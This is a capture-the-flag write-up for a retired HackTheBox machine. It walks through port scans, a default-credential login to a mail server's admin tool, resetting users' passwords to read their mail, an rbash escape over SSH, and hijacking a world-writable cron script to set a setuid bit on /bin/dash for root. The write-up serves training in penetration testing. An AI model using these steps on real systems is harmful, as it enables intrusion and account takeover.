This is the write-up for the box SolidState that got retired at the 27th January 2018. My IP address was 10.10.14.23 while I did this.
Let's put this in our hosts file:
10.10.10.51 solidstate.htb
Starting with a Nmap scan:
nmap -sC -sV -o nmap/solidstate.nmap 10.10.10.51
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.23 [10.10.14.23]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Full TCP port range scan:
nmap -p- -T5 -o nmap/ss-allports.nmap 10.10.10.51
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Scanning for vulnerabilities on these services:
nmap -p 22,25,80,110,119,4555 -sC -sV -o nmap/ss-vulns.nmap --script vuln 10.10.10.51
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
25/tcp open smtp JAMES smtpd 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
| Found the following possible CSRF vulnerabilities:
(...)
110/tcp open pop3 JAMES pop3d 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
119/tcp open nntp JAMES nntpd (posting ok)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
4555/tcp open james-admin JAMES Remote Admin 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
The web page looks like a generic company website that offers security consulting services. All the pages are HTML and there is a contact form that seems to do nothing after submitting.
When connecting to port 4555 with nc
, it outputs JAMES Remote Administration Tool 2.3.2 and wants us to enter a login ID and a password.
After trying out some default credentials, the login ID root and the password root is valid.
With the command HELP
the tool shows what we can do.
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
It is possible to change the password of these users:
setpassword mailadmin newpass1
Password for mailadmin reset
As some mail ports are open, lets try to access the mailbox of these users with any mail client such as Evolution. After resetting the passwords of all users, only the user mindy has an interesting email with the subject "Your Access":
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
The credentials work on SSH and we are logged in as mindy:
ssh mindy@10.10.10.51
In the home folder there is a bin folder but when trying to access it, it says "-rbash: cd: restricted" which means that mindy is in restricted bash. Looking at /etc/passwd confirms that:
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
To get out of it we can SSH into the box with a command:
ssh mindy@10.10.10.51 bash
This will execute bash and the user is not restricted anymore so we can execute any command. Lets start any Linux Enumeration script to get an attack surface on the box:
curl 10.10.10.51 -o LinEnum.sh
bash LinEnum.sh -t
After analyzing it, there is the file /opt/tmp.py that has write and execute permissions for everyone. The Python script just cleans the /tmp directory. As it is writeable by anyone, we can put our own commands in there:
#!/usr/bin/env python
import os
import sys
try:
os.system('/usr/bin/touch /tmp/test')
except:
sys.exit()
Saving this and waiting for a couple of minutes, a cronjob will execute this and create the file /tmp/test that is owned by root. Now change the script to set a Setuid bit on a binary that executes a shell, so we can execute it with root permissions.
os.system('chmod 4755 /bin/dash')
After the cronjob runs the Setuid bit is set on /bin/dash and we can execute dash
.
This starts a shell in which the effective user ID (EUID) is root and the box is done!